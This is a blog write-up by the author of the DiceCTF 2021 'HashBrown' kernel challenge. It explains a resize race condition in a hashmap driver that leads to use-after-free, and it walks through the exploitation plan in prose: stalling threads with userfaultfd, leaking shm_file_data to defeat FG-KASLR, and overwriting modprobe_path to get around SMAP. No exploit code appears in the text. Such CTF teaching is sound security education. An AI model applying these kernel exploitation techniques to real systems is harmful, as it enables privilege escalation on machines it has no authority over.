Search This Blog

Sunday, February 7, 2021

DiceCTF 2021 HashBrown Writeup: From Kernel Module Hashmap Resize Race Condition to FG-KASLR Bypass

This was the first time DiceCTF has been hosted (by DiceGang), and overall, I think it was a quite a successful experience and the CTF had a high level of difficulty. I wrote a single challenge called HashBrown, which had 7 solves total. I thought I would make a brief and short writeup to summarize the intended path (which most solvers took).


The following is the challenge description.

The kernel version was version 5.11, with SMEP, KPTI, and SMAP on. SMEP and KPTI aren't really big deals, but SMAP can make the process a more painful.

Setting CONFIG_SLAB causes the kernel to not use the traditional default SLUB allocator (which preserves the freelist linked list metadata on the kernel heap); instead it uses the older SLAB allocator which doesn't keep metadata on the heap (but rather in a slab manager that stores freed indices with the kmem_bufctl_t field). SLAB_FREELIST_RANDOM applies to both the SLAB and SLUB allocator, and is usually set in the kernels used in common distros (such as Ubuntu). I've experienced that feature multiple times during kernel exploits, and instead of having a nice linear heap that provides allocations in a deterministic order, the freelist order is scrambled and randomized upon initialization of new pages. Opening the module in GHIDRA/Binja/IDA also clearly reveals that usercopy is hardened.

The most important addition to this kernel challenge is FG-KASLR (as I was inspired by HXP ctf's kernel rop challenge that had FG-KASLR), which is a non mainline kernel security feature that provides extra randomization on top of KASLR. Usually, even with ASLR, you can rebase an entire binary by rebasing the leaks off of the non ASLR'd offsets. FG-KASLR brings an extra layer of protection (while also adding a second to the boot time) by compiling many of the functions in its own section, and re-scrambling all the sections during boot. Offset leaks should no longer be deterministic, but FG-KASLR only applies to functions that satifies the following criteria: the function is written in C and is not in a few special specific sections. Pointers to kernel data or some of the earlier parts of kernel code (and I think even the kpti trampoline that is useful in exploitation) remains at a constant offset from kernel base.

Now, let's take a look into the provided source code (players seem to have more fun with pwn when there is less reversing, so I released it 2 hours into the CTF):

To summarize the codebase, it is basically a hashmap in a driver, that can hold a maximum of 0x400 entries with a maximum array size of 0x200. Threshold is generally held at 0.75 and the hash function is copied from the JDK codebase before version 8. The overall code is also quite safe, as double frees, null dereferences, etc. are all checked throughout, and the linked list operations are also safe when collisions occur for the hashmap buckets. Size and error checks are also performed, and kzalloc() is used to null out newly allocated regions (to prevent leaks and such). However, having two mutex locks - one for resize and one for all other hashmap operations is quite strange, so perhaps it is a good idea to take a closer look at the resize function.

When resize is triggered, a new hashmap that has an array that is twice as large as the old one is initialized, but the global hashmap struct does not have its bucket field replaced yet. In order to not corrupt the linked list in the previous hashmap or lose hash entries, the module has to allocate new hash entries and copy over the data (including the value pointer of the key value pair of hashmap entries), and then place them in the newly allocated hashmap bucket accordingly (debugging this structure can be somewhat painful, so perhaps writing a gdb python handler can help). If the new request from the user is also valid, resize proceeds to userland copy the data over. Then, all the old hash_entries are freed (but not the values, as that won't make sense) and the old bucket is freed, before the global hashmap has its bucket array replaced.

While the resize function does sound safe, let us go back to the point about the 2 mutexes. Notice how a race condition can be created here? If we can get the hashmap resize to trigger and have it copy over values while also deleting a value (that is already copied over) from the current buckets, we can create a UAF scenario! If one mutex was used instead, or the bucket was replaced immediately in resize, this would not be an issue. I was hoping this would make for a more interesting CTF challenge bug, rather than a standard obvious heap note UAF or overflow by X scenario.

Now that we know the bug, we can come up with an exploitation plan. The first thing we need to do is to create a stable race scenario; otherwise your success rate will be quite low and you will run out resize operations really quickly. This is quite easy, as an add request when the threshold limit is hit causes the userland copy for the new entry to be handled in the code of resize(). We can use the classic userfaultfd pagefault technique to hang kernel threads on userland copy. 

On a sidenote, that setting has been the default for a very long time, but has actually been disabled in the 5.11 release candidate codebase; I had to make a one line patch in the kernel to revert it to the traditional behavior, but did not make note of that in the description as it is trivially easy to check that setting during OS runtime, would spoil the challenge if I explicitly changed the setting in the init script, and building the kernel with fg-kaslr with other versions was a mess.

Since the value allocations are capped at 0xb0, there is a limited range of useful kernel structures we can trigger to obtain leaks. A potential go-to would be seq_operations, but it only holds 4 function pointers that are all affected by FG-KASLR. I used shm_file_data, which contains pointers to kernel data. To leak this, we allocate just enough to the first threshold limit, and then trigger a resize. Once the resize function finishes copying over all the old hash_entries (including the value pointers), we use uffd technique to hang it, delete a value in another thread and use shmat to trigger an allocation of shm_file_data. After resize, we can still read that pointer value and we will be able to rebase kernel base.

In order to obtain arb write, we can follow a similar plan as the method used for leak. However, as SMAP is enabled, our options for gaining arb exec is quite limited. One nice technique to bypass SMAP is to overwrite some of the writeable strings the kernel uses in conjunction with usermode helper functions; modprobe_path is probably the most famous one, but many other also exist. We should use the race condition to UAF over a kmalloc-32 chunk to eventually overwrite the value pointer of a hash_entry that is allocated later. It is important to note that all the hash_entires in the current global bucket is freed as well, so the UAF'd chunk will not be the first chunk returned; you can easily check when you have control over a hash_entry by repeatedly using get_value. I noticed that the returning order of the freelist was somewhat deterministic but recall that this order was also scrambled in a previous kernel challenge; please let me know if you can clarify this part for me but I believe it is because a new page is not needed (and hence, shuffling doesn't occur).

Here is my final exploit and the result of running the exploit:

Another interesting solution I saw came from LevitatingLion of RedRocket CTF team. The exploit used a nice arb read write primitive to start reading for kernel data at 0xffffffffc0000000 scanning for kernel data and the modprobe string (like a pseudo-egghunt) to bypass FG-KASLR.

Feel free to let me know if any of my explanations were wrong, or let me know if you have any questions. Congrats to Pernicious from RPISEC for taking first blood and D3v17 for doing last minute testing for me! Thanks once again to all those who participated in DiceCTF and fellow organizers (especially the infra people asphyxia and ginkoid), and make sure to check out the other writeups, such as kmh's extreme pyjail challenge TI1337 Plus CE, defund's crypto challs, and NotDeGhost's Chromium sandbox escape challenge Adult CSP.